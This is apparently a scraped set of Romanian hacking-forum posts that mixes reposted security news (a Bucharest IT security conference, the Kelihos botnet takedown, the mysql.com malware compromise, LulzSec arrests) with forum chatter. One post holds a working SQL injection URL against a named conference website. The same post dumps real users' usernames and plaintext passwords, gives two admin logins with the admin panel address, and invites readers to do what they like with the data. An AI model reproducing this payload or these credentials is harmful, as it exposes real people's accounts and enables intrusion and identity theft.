Nytro

Mie tot imi merge redirectul, apare si mesajul...

Arsi: Conferintele FinMedia, Evenimentele FinMedia, Publicatiile FinMedia

Forumul securitatii IT, pe 11 octombrie de Laurentiu Popa | 4 octombrie 2011 Finmedia, in parteneriat cu KPMG Romania, organizeaza a patra editie a Romanian IT&C Security Forum, eveniment important pentru piata produselor si serviciilor de securitate IT. In contextul noilor forme de hacking, cand sunt dezvoltate forme avansate de atacuri, care sa reziste mai bine in timp si de pe urma carora se urmareste sa se obtina controlul infrastructurilor IT, cand dispozitivele mobile castiga teren vazand cu ochii, cand securitatea este si mai amenintata de comportamentul angajatilor ce poate duce la erori umane, ce faciliteaz? pierderea de date si vulnerabilizeaza infrastructura, riscurile de compromitere a afacerii cresc exponential. Pe o piata de produse si servicii de securitate IT care ruleaza oficial sub 15 milioane de euro pe an, exista nevoia de a se face evaluari periodice, a se gasi un prilej de a privi atent la noutati, strategii si abordari, a desprinde perspective si initiative in acest domeniu de nisa. Evenimentul se va tine pe 11 octombrie 2011, incepand cu ora 9, la Hotel Crowne Plaza din Bucuresti, sala Magnolia. Cine participa: - reprezentanti ai organismelor oficiale si ai asociatiilor profesionale - middle managementul din companii mijlocii si mari care au responsabilita?i directe in business - IT manageri, ingineri de sistem - consultanti independenti de specialitate - auditori si persoane certificate - furnizori de sisteme si solutii de securitate IT - CIO si CISO din banci comerciale Va sfatuim sa participati, pentru a va informa in legatura cu dinamica pietei globale de securitate la nivel european, prin comparatii cu evolutiile din Romania, norme, reglementari si noutati pe linie institutionala. De asemenea, vor fi prezentate noile tendinte, abordari si mijloace de protectie a companiei contra cybercrimei. Per total, se prezinta o imagine de ansamblu asupra ofertei de moment de pe piata de produse si servicii specializate pe securitate IT. Sursa: Forumul securitatii IT, pe 11 octombrie | Hit.ro Se vede din programul lor ce rahat o sa fie, industrializarea hacking-ului... De cand "restrictionarea accesului angajatilor la Internet" e o problema de securitate? TAXA DE PARTICIPARE: 496 lei /pers, TVA inclus. Sa-i fut in gura, muritori de foame, de-ar avea parte de ei in mormant. Program (cu SQL Injection) http://www.finmedia.ro/conferences/conferinta.php?cod=rom_itc_sec_for&editie=4&comanda=program De XSS in cautare nici nu se pune problema. Cand am timp ma uit in detaliu. Si tot nu inteleg, de ce "Forumul securitatii IT"? In fine, am ceva idei Edit: Tabele: conferinte contacte log speakeri speakeri_conf sponsori sponsori_conf utilizatori utilizatori_conf articole cuprins_reviste descriere_sectiuni newsletter Utilizatori si parole (tabelul "utilizatori"): galatop100:galatop100 ,alina_berlea:gianny ,Catalin Spataru:sdc66sdc66 ,georgs:elenageorge ,eiovu:silverbird357 ,vizitator: ,danielnvasile:tumpilica ,roxanatoader:19962407 ,Daniel:daniel ,sache:sachita ,paltineanu:secret ,valentinbogdan:supersucces ,macovei:fin.media2004 ,lupiduph:piroman ,bolteanu:123456 ,ddbroa:123456 ,sviorel:vserbu ,sbejan:garidas ,diana:itdromania ,sorinaun:heralzii ,Alex:h2oh2o ,Alecks:h2oh2o ,ramona:roxana ,Flory:mazepa ,: ,Ecaterina:caterinar ,gabiarsene:razvan ,iona:guguloi ,madalina:madalina ,gerald.dinca:star86 ,FLORENTINS:CCPCFRDC ,cgalea:crimong ,PopM:autovit ,da-tech:datechinfo ,georgiana:15201929 ,MARCEL:MARCEL ,Burky:MpRomania ,dorian:doru ,accalugaru:corina ,VILIE:eili ,catalina:piticque ,iulianbudusan:1t5m9r4h ,dinescu:sandi ,simonada:margareta ,caliman:emil ,erykal:pasttense ,munteanu:munteanu ,mdanilov:pezevenghi ,PRIMARIE:DTS ,Adrian:adrian ,PetronelaD:alfach ,vicbogdan2004:david18 ,doina:draganescu ,LAURENTIU:l Sintaxa: www.finmedia.ro/conferences/conferinta.php?comanda=program&editie=4&cod=null' union select 1,2,3,4,5,6,7,group_concat(username, 0x3a, password, 0xD, 0xA),9,10,11,12,13,14,15,16 from utilizatori-- --+-- Thanks tdxev. Conturi de admin: Username: eiovu Password: silverbird357 Username: conferinte Password: 1master2 Administrare: http://www.finmedia.ro/conferences/admin.php Faceti ce doriti cu datele. PS: Problema rezolvata: http://www.finmedia.ro/conferences/

Da, singurul lucru util la scoala e ca iti faci prieteni. In rest, nu te ajuta cu nimic.

Exploit Pack - An open source security framework Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a Java GUI, Python as Engine and well-known exploits on the wild. It has an IDE to make the task of developing new exploits easier, instant search features and XML-based modules. A GPL license for the entire project helps to ensure the code will remain free. It also features a ranking system for contributors, tutorials for everyone who wants to learn how to create new exploits and a community to call for help. Why use Exploit Pack? It has a module editor that allows you to create your own custom exploits. There is an instant search feature built-in on the GUI for easier access to modules. Modules use XML DOM, so they are really easy to modify. It uses Python as its Engine because the language is more widely used on security related programming. A tutorial is also provided. If you want to earn money, they will pay you for each module you add to Exploit Pack. Download: http://exploitpack.com/download-framework Sursa si video: Exploit Pack - An open source security framework ~ THN : The Hacker News

VIDEO: primul telefon cu ecran flexibil - Samsung Galaxy Skin de Radu Eftimie | 4 octombrie 2011 Samsung Galaxy Skin reprezinta ultima frontiera in lumea telecom si o noua incercare a sud-coreenilor de a detrona Apple: device-ul va avea un display AMOLED care ii va permite sa se plieze in jurul unui cilindru cu grosimea de 1 inci. Display-ul foloseste un strat de poliamida in loc de sticla. Dar, materialul cel mai important care a facut posibila realizarea acestui telefon, chiar si ca prototip, este grafenul, care este cunoscut drept materialul "minune". Grafenul este cel mai rezistent material din lume (de 200 de ori mai rezistent decat otelul), potrivit cercetatorilor de la universitatea Columbia. Ca specificatii tehnice, Galaxy Skin va avea: - rezolutie de 800x480 pixeli - camera de 8 megapixeli - 1 GB de memorie RAM - procesor de 1,2 GHz Deocamdata este un concept. Lansarea unui astfel de telefon ar putea avea loc in a doua jumatate anului viitor. Iata un videoclip sugestiv cu noua "minune" cu care Samsung se pregateste sa cucereasca lumea in 2012: Sursa si video: VIDEO: primul telefon cu ecran flexibil - Samsung Galaxy Skin | Hit.ro

Cu cURL trimiti datele de logare din formlar. La citirea datelor, va trebui sa salvezi headerele, e optiune pentru asta COOKIE_JAR cred, ca la urmatorul request sa fii logat. Apoi faci direct request catre startpage.php.

Certificarile "care se respecta" nu se dau asa, aiurea, de acasa... Se asigura pe cat posibil ca nu ai informatiile din teste la indemana. Pana la urma, daca e asa, poti lua un examen chiar daca nu stii nimic, cat timp ai informatiile la indemana. Din cate stiu esti (d)in Germania. Acolo gasesti probabil multe sedii unde poti da multe certificari.

VIDEO: Maine se lanseaza iPhone 5. Cum ar trebui sa arate? de Radu Eftimie | 3 octombrie 2011 Pentru ca iPhone 5 va fi cu siguranta lansat pe piata maine, ne-am gandit sa adunam cele mai vehiculate informatii care au aparut pana acum despre viitorul smartphone de la Apple si sa vi le prezentam. Ce asteapta fanii de la urmatoarea generatie de telefoane Apple? Procesor dual-core identic celui folosit pe tableta iPad 2, dar si memorie suficienta pentru orice... 1 GB RAM, ecranul ar trebui sa fie mai mare (de 3,7 sau 4 inci) dar cu aceeasi tehnologie - retina display. In plus, tot pasionatii Apple ar vrea ca telefonul sa nu fie mai gros de 8 mm si sa fie dotat cu o camera foto de 8 MP. Multi incercat sa propuna un design concret pentru iPhone 5 pe baza zvonurilor privind dotarile hardware ale telefonului. Mai jos puteti urmari cateva clipuri create pe baza informatiilor "scurse" pe net. Pe 4 octombrie, la ora 8 seara - ora Romaniei - vom afla care dintre aceste previziuni au fost adevarate. Sursa si videoclipuri: http://www.hit.ro/telefoane-mobile/Maine-se-lanseaza-iphone-5-Cum-ar-trebui-sa-arate

S-a folosit de informatii publice, deci ar avea tot dreptul. Da, probabil exista persoane mai "smechere", dar nu s-au ocupat.

Linux - Means Freedom [The Hacker News Magazine] Dear Readers, We here at The Hacker News were very humbled to be given the opportunity to celebrate 10 millions hits to the website. Wow! We are so very grateful for your support and as I told you last month, I don't think Hacking is going anywhere and neither are we!! Your feedback is very important to us. Feel free to send us your thoughts and desires for Hacking news. If you want to write an editorial, let us know. We'd love to include it next month. For now, we will see you in our daily and best wishes for a great month. Content of October Edition: Linux - Means Freedom How to make my Linux Secure ? Hackathon Insider Threads Vs Hackers Linux : How to Series by Alok Srivastav Window 8 - Touch the Future The Security Model of Window 8 Server Microsoft Security Development Cycle September Cyber Attacks Download: http://theevilhackerz.com/THN-oct2011.pdf http://theevilhackerz.com/THN-oct2011.rar Sursa: Linux - Means Freedom [The Hacker News Magazine] October 2011 Issue Released ~ THN : The Hacker News

Kaspersky Lab, Kyrus Tech si Microsoft au inchis botnet-ul Hlux/Kelihos By Radu FaraVirusi(com) on October 3, 2011 Kaspersky Lab, Microsoft si compania IT Kyrus Tech au colaborat la desfasurarea operatiunilor de inchidere a retelei de computere-zombie Kelihos, initial numita Hlux de catre Kaspersky Lab. Botnet-ul, compus din aproximativ 40.000 de computere infectate, era folosit de catre infractorii cibernetici pentru a trimite miliarde de mesaje spam, a fura informatii personale, a lansa atacuri DDoS, precum si pentru alte activitati ilegale. Microsoft a initiat un proces impotriva a 24 de persoane aflate in spatele acestui botnet, actiune care a dus la inchiderea domeniilor de Internet folosite de serverele de comanda si control ale retelei. Initiativa Microsoft a fost sustinuta prin contributii din partea Kaspersky Lab si o declaratie directa din partea Kyrus Tech, care oferea informatii detaliate si dovezi despre Kelihos. Kaspersky Lab a jucat un rol important in dezactivarea botnet-ului, colaborand cu Microsoft inca de la inceputul anului 2011 si oferind informatii in timp real despre activitatea Kelihos. La momentul actual, Kaspersky Lab se asigura ca reteaua nu mai poate fi controlata de nimeni – specialistii companiei au modificat codul folosit in administrarea acesteia, au spart protocolul de comunicare, au descoperit vulnerabilitatile infrastructurii peer-to-peer si au dezvoltat instrumentele specifice pentru a o contracara. In momentul in care actiunea legala a Microsoft a condus la dezactivarea domeniilor de Internet folosite de atacatori, Kaspersky Lab a patruns in retea si a preluat-o sub administrarea sa. „Kaspersky Lab a avut un rol-cheie in aceasta operatiune, oferindu-ne informatii importante si detaliate, culese pe baza analizei tehnice si a intelegerii modului in care opereaza Kelihos”, spune Richard Boscovich, avocat in cadrul Microsoft Digital Crimes Unit. „Aceste informatii au contribuit la inchiderea cu succes a botnet-ului, dar au servit si ca probe in instanta. Le multumim pentru sustinere si pentru dorinta lor de a lupta pentru un Internet mai sigur”, completeaza acesta. „Din 26 septembrie, cand Kaspersky Lab a initiat operatiunea de infiltrare in botnet, acesta a fost inoperabil”, afirma Tillmann Werner, Senior Malware Analyst Kaspersky Lab Germania. „Calculatoarele-zombie comunica acum cu noi, de aceea putem initia, de exemplu, activitati pentru a descoperi numarul de infectii pentru fiecare tara. Pana acum, Kaspersky Lab a numarat 61.463 de adrese IP infectate si colaboreaza cu toti furnizorii de servicii Internet (ISP) implicati, pentru a avertiza administratorii retelelor cu privire la acestea”, incheie Werner. Kelihos este un botnet de tip peer-to-peer si este compus din mai multe straturi – „controllers”, „routers” si „workers”. „Controllers” sunt computerele presupuse a fi controlate de catre infractorii cibernetici. Acestea distribuie comenzi tuturor celorlalte unitati si supravegheaza structura dinamica a retelei peer-to-peer. „Routers” sunt masini infectate, care au adrese IP publice, si sunt utilizate pentru a trimite spam, a colecta adrese de e-mail, a fura date de autentificare din fluxul retelei si multe altele. Microsoft a anuntat ca a adaugat semnatura de detectie pentru malware-ul Kelihos in Malicious Software Removal Tool, distribuit prin serviciul de update automat, care a dus la dezinfectarea unui numar mare de computere. Kaspersky Lab colaboreaza in mod constant cu Microsoft, un exemplu recent in acest sens fiind operatiunea de identificare si eliminare a viermelui Stuxnet, folosit de hackeri pentru a controla infrastructura IT industriala a centralelor nucleare din Iran. Kaspersky Lab a initiat si un sondaj, prin intermediul caruia intreaba utilizatorii cum trebuie sa procedeze cu botnet-ul Kelihos, din moment ce are control asupra sa. Pentru a raspunde, accesati http://www.securelist.com/en/polls. Kaspersky Lab multumeste SURFnet pentru sustinere in derularea operatiunii de infiltrare in botnet-ul Kelihos. Sursa: http://www.faravirusi.com/2011/10/03/kaspersky-lab-kyrus-tech-si-microsoft-au-inchis-botnet-ul-hluxkelihos/

Nu ai nevoie de cursuri, o carte cam e de ajuns, de obicei e specificata la informatiile despre examen. Si exista carti speciale pentru examenele de ceritificare, programe cu intrebari si multe altele...

Eu am luat MCTS Windows Internals, costa cam 50 - 80 de dolari, nu mai stiu, eu l-am dat gratis cu voucher de la facultate (MSP - Microsoft Student Partners). Am invatat singur, cateva ore... Apoi am mers la un centru unde se pot da, sunt vreo 8 centre in Bucuresti. Ai deschisa doar o aplicatie si nu ai voie cu telefon, nimic. Pe web nu stiu decat de Cisco, dar nu am dat si nu cred ca poti da de acasa.

Au mai primit 2 persoane VIP, persoane care au prezentat ceva la Defcamp. Nu spun inca despre cine e vorba, vom discuta...

Sa nu mai vad link-uri catre adf.ly, la munca cu voi...

A fost prea misto, abia astept editia urmatoare. Cand am timp scriu eu un mic "articol" despre tot, din perspectiva mea. @Paul4games - Ba cat de mare poate sa fie (nu stiu daca am mancat una mai mare, si am mancat multe...), nu am putut sa o mananc pe toata... Si poate sa fie de la foamea acuta, dar a fost al dracu de buna. @Hertz - Te-am huiduit putin la "premiere", ai cateva dedicatii, dar pana la urma au fost foarte bine gandite probele.

Si, cine e Michael asta?

Mysql.com hacked, serving malware Posted on 26.09.2011 Mysql.com has been hacked and is currently serving malware, Armorize warns. The company has detected the compromise through its website malware monitoring platform HackAlert, and has analyzed how the compromise of the site's visitors unfolds. The mysql.com website is injected with a script that generates an iFrame that redirects the visitors to http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php, where the BlackHole exploit pack is hosted. "It exploits the visitor's browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, ...), and upon successful exploitation, permanently installs a piece of malware into the visitor's machine, without the visitor's knowledge," say the researchers. "The visitor doesn't need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection." What type of malware is served is still unknown, but the worrying thing is that currently only 9 percent of the AV solutions used by VirusTotal block it. It is, of course, impossible to say who the attackers are. The domain reached through the iFrame is registered to one Christopher J Klein from Miami and is located in Berlin, Germany. The domain serving the exploit and the malware is located in Stockholm, Sweden. The administrators of the mysql.com domain are being contacted, but the site is still up and compromised, say the researchers. According to Sucuri Security researchers, the site has been compromised via JavaScript malware that "infects a web site through a compromised desktop (with virus), where it steals any stored password from the FTP client and uses that to attack the site." Trend Micro researchers add that they have recently discovered a denizen of a Russian underground forum selling root access to some of the cluster servers of mysql.com and its subdomains, asking at least $3,000 for each access, and that they have notified mysql.com administrators of their discovery a week ago. Sursa: https://www.net-security.org/malware_news.php?id=1853

Sa nu uitati sa va luati tricourile cu "Fan Nytro" :->

E in regula, cine e interesat poate sa ii dea un PM.

1) E penibil sa faci pagina de Facebook pentru asa ceva 2) Trebuie sa fii psihopat sa iti bati joc de astfel de lucruri

Asta sa insemne ziua securitatii? Si site-uri .ro? Ce mentalitate jegoasa, tampita...

Superb, foarte inteligent.

FBI Arrests Suspected LulzSec and Anonymous Hackers By Jana Winter Published September 22, 2011| FoxNews.com he FBI arrested two alleged members of the hacking collectives LulzSec and Anonymous on Thursday morning in San Francisco and Phoenix and secured charges against a third suspect from Ohio, the Justice Department confirmed Thursday. Search warrants were also being executed in New Jersey, Minnesota and Montana, an FBI official told FoxNews.com, which first reported the arrests. One individual was described as part of the LulzSec group, the other part of the group that calls itself Anonymous, the official said. Cody Kretsinger, a 23-year-old from Phoenix, was charged with conspiracy and the unauthorized impairment of a protected computer, according to the federal indictment unsealed Thursday morning. In another indictment, Christopher Doyon, 47, of Mountain View, Calif., and Joshua Covelli, 26, of Fairborn, Ohio, were charged with conspiracy to cause intentional damage to a protected computer, causing intentional damage to a protected computer and aiding and abetting. The indictment says both men participated in a "distributed denial of service" attack on Santa Cruz County, Calif.'s computer servers in 2010, causing them to go offline. It alleges that the attack was carried out by the People's Liberation Front, which is associated with hacking groups such as Anonymous. Kretsinger, who goes by the online name "recursion," is believed to be a current or former member of LulzSec and is accused of being involved in the hacking of Sony Pictures Entertainment. Kretsinger and other coconspirators are accused of using a hacking technique called a SQL injection to obtain confidential information from Sony's computer systems. According to the indictment, he and coconspirators distributed stolen information by posting it on LulzSec's website before announcing the attack on Twitter. In order to evade law-enforcement detection, Kretsinger erased the hard drives used to carry out the Sony attack, the indictment said. He is expected to appear in a Phoenix federal court Thursday afternoon. Members of the Los Angeles FBI field office also arrested an alleged member of Anonymous in San Francisco. The suspected hacker is homeless and alleged to have been involved in Santa Cruz County government website cyberattacks, an FBI official told FoxNews.com exclusively. That suspect appears to have been Doyon, though this couldn't be immediately confirmed Thursday night. LulzSec is a splinter group from the “hacktivist” collective Anonymous, a loose collection of cybersavvy activists inspired by WikiLeaks and its head Julian Assange to fight for Internet freedoms — along the way defacing websites, shutting down servers, and scrawling messages across screens web-wide. While Anonymous is largely a politically motivated organization, LulzSec’s attacks were largely done “for the lulz” — Internet slang meaning “for the fun of it.” Both groups have been targeted by the FBI and international law enforcement agencies in recent months. In July, FoxNews.com broke the news that 16 alleged Anonymous members had been arrested in the U.S. and the U.K. Several high profile leaders of the group have been arrested since, including two individuals believed to be among the founders of LulzSec — and who shared the online name "Kayla." The metropolitan police in London arrested the first alleged member of the LulzSec group on June 20, a 19-year-old teen named Ryan Cleary. Subsequent sweeps through Italy and Switzerland in early July led to the arrests of 15 more people, all between the ages of 15 and 28. The two groups are responsible for a broad spate of digital break-ins targeting governments and large corporations, including Japanese technology giant Sony, the U.S. Senate, telecommunications giant AT&T, Fox.com, and other government and private entities. Sursa: FBI Arrests Suspected LulzSec And Anonymous Hackers | Fox News